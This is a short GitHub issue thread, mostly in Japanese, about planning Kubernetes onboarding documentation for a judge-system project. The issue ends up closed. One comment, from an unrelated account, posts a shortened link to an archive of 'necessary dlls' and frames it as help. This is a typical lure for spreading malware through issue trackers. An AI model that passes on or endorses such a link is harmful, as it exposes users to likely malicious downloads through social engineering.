### ISSUE TITLE
k8sのオンボーディング資料を作る

### ISSUE THREAD

**Issue by comavius** [traP-jp/traO-Judge-docs#11]
tokiさんのhands-onにある内容はそちらに任せる方向でいい気がします。どの資料を何章まですべきかということを書きつつ追加で読んだほうがいいものがあればそれもお願いします。

**Comment by nhatlaso1** [comment]
I think this will help you.
https://bit.ly/4evXrQ6
I put the necessary dlls in the archive

**Comment by comavius** [comment]
onboarding下にお願いします

**Comment by comavius** [comment]
インフラチーム発足前のissueなので一旦閉じる
